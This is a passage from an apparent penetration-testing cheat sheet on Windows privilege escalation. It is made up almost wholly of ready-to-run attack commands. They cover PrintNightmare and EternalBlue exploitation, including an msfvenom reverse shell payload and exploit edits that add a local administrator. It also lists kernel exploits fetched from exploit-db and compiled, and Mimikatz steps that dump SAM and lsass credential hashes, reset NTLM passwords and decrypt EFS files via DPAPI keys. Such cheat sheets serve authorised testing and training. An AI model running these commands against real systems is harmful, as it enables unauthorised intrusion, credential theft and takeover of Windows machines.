## or, if the service cannot be restarted, reboot (StartMode must be Auto)
wmic service where caption="Serviio" get name, caption, state,startmode
whoami /priv | findstr SeShutdownPrivilege ## "Disabled" is fine, the privilege only has to be present
shutdown /r /t 0
```

### 03.8 [PrintNightmare](https://github.com/calebstewart/CVE-2021-1675)

```bash
## ------------------| Verify vulnerability
impacket-rpcdump @<IP> | grep -A2 -B2 MS-RPRN 

## ------------------| Download and execute
wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare 
## If you get any kind of errors like ExecutionPolicy; try with evil-winrm
evil-winrm -i <IP> -u <USERNAME> -p <PASSWORD>  -s $(pwd)
CVE-2021-1675.ps1
menu
Invoke-Nightmare

## Then use psexec to login with new creds
impacket-psexec adm1n:'P@ssw0rd'@<IP>
```

### 03.9 EternalBlue (MS17-010)

```bash
## ------------------| Check
nmap -sV -Pn -p 445 --script smb-vuln-ms17-010 $IP

## ------------------| Setup
git clone https://github.com/helviojunior/MS17-010.git && cd MS17-010
virtualenv -p python2 venv
source venv/bin/activate
pip2 install impacket pycrypto # This will get an error; that's fine
python checker.py <IP>
msfvenom -p windows/shell_reverse_tcp LHOST=<YourIP> LPORT=4545 -f exe > rev.exe

## ------------------| Method I
python send_and_execute.py <IP> rev.exe

## ------------------| Method II
## Open zzz_exploit.py file and edit following lines
service_exec(conn, r'cmd /c net user h4rithd Password123 /add')
service_exec(conn, r'cmd /c net localgroup administrators h4rithd /add')
python zzz_exploit.py <IP>
```

### 03.10 [Windows-Exploit-Suggester WES-NG](https://github.com/bitsadmin/wesng)

```bash
## ------------------| Install
git clone https://github.com/bitsadmin/wesng.git
cd wesng
chmod +x wes.py

## ------------------| Download latest definitions
./wes.py --update
./wes.py -u

## ------------------| Download latest version of WES-NG
./wes.py --update-wes

## ------------------| Determine vulnerabilities
./wes.py systeminfo.txt

## ------------------| Determine vulnerabilities using both systeminfo and qfe files
./wes.py systeminfo.txt qfe.txt

## ------------------| Determine vulnerabilities and output to file
./wes.py systeminfo.txt --output vulns.csv
./wes.py systeminfo.txt -o vulns.csv

## ------------------| Determine vulnerabilities explicitly specifying KBs to reduce false-positives
./wes.py systeminfo.txt --patches KB4345421 KB4487017
./wes.py systeminfo.txt -p KB4345421 KB4487017

## ------------------| Determine vulnerabilities, filtering out those of KBs published before the publishing date of the most recent KB installed
./wes.py systeminfo.txt --usekbdate
./wes.py systeminfo.txt -d

## ------------------| Determine vulnerabilities explicitly specifying definitions file
./wes.py systeminfo.txt --definitions C:\tmp\mydefs.zip

## ------------------| List only vulnerabilities with exploits, excluding IE, Edge and Flash
./wes.py systeminfo.txt --exploits-only --hide "Internet Explorer" Edge Flash
./wes.py systeminfo.txt -e --hide "Internet Explorer" Edge Flash

## ------------------| Only show vulnerabilities of a certain impact
./wes.py systeminfo.txt --impact "Remote Code Execution"
./wes.py systeminfo.txt -i "Remote Code Execution"

## ------------------| Only show vulnerabilities of a certain severity
./wes.py systeminfo.txt --severity critical
./wes.py systeminfo.txt -s critical

## ------------------| Validate supersedence against Microsoft's online Update Catalog
./wes.py systeminfo.txt --muc-lookup
```

### 03.11 Windows Kernel Exploits

**Download all the binary files from:** <https://github.com/SecWiki/windows-kernel-exploits>

#### Microsoft Windows - Local Privilege Escalation (MS15-051)

```bash
wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS15-051/MS15-051-KB3045171.zip
```

#### `USBPcap` Null Pointer Dereference Privilege Escalation (CVE-2017-6178)

```bash
## ------------------| Information
# Date             - 07th March 2017
# Discovered by    - Parvez Anwar (@parvezghh)
# Vendor Homepage  - http://desowin.org/usbpcap/ 
# Tested Version   - 1.1.0.0  (USB Packet capture for Windows bundled with WireShark 2.2.5)
# Driver Version   - 1.1.0.0 - USBPcap.sys
# Tested on OS     - 32bit Windows 7 SP1 
# Vendor fix url   - not yet
# Fixed Version    - 0day
# Fixed driver ver - 0day

## ------------------| Check for a vulnerable version
driverquery /v | findstr USBPcap.sys
type "C:\Program Files\USBPcap\USBPcap.inf"

## ------------------| Exploit
curl -o exploit.c https://www.exploit-db.com/raw/41542
gcc.exe exploit.c -o exploit.exe
.\exploit.exe
```

## 04. [Mimikatz](https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210810-2)

* More command available at [here!](https://docs.h4rithd.com/windows/smb-ad-enumeration#18.-mimikatz)
* Dump all users' `NTLM` hashes (SAM and `lsass`)

```bash
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit" >> mimikatz-sam.out 
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> mimikatz-logonpasswords.out       

## ------------------| If you have an LSASS minidump (or Rekall) instead
pip3 install pypykatz
pypykatz lsa minidump lsass.DMP --json
```

* Set password for account

```bash
.\mimikatz.exe "lsadump::setntlm /user:USERNAME /ntlm:NTLMHASH" "exit"
```

* Decrypt EFS files. \[[source](https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files)]

```bash
## ------------------| Get file's Certificate Thumbprint value
cipher /c c:\users\file.txt | Select-String "Certificate thumbprint"
## You can also get this with the following command.
dir C:\Users\<UserName>\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\ | Select Name  

## ------------------| Getting the certificate
.\mimikatz.exe "crypto::system /file:C:\Users\<UserName>\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\<Certificate_Thumbprint> /export" "exit"    
## Download the *.der file to your machine.

## ------------------| Getting the masterkey
gci C:\Users\tolu\AppData\Roaming\Microsoft\protect\
gci -hidden C:\Users\tolu\AppData\Roaming\Microsoft\protect\<SID_VALUE>\
.\mimikatz.exe "dpapi::masterkey /in:C:\Users\<UserName>\AppData\Roaming\Microsoft\protect\<SID_VALUE>\<FileName> /password:<UserPassword>" "exit"     

## ------------------| Decrypting the private key
gci C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\RSA\
gci C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\RSA\<SID_VALUE>\
.\mimikatz.exe "dpapi::capi /in:C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\RSA\<SID_VALUE>\<FILE> /masterkey:<SHA-1>" "exit"
## Download the *.pvk file to your machine.

## ------------------| Building & Installing the correct PFX
openssl x509 -inform DER -outform PEM -in *.der -out public.pem
openssl rsa -inform PVK -outform PEM -in *.pvk -out private.pem
openssl pkcs12 -in public.pem -inkey private.pem -password pass:<NewPassword> -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx       
## Copy the cert.pfx file to remote machine.
certutil -user -p <NewPassword> -importpfx cert.pfx NoChain,NoRoot

## ------------------| Data access
type "c:\users\file.txt"
```

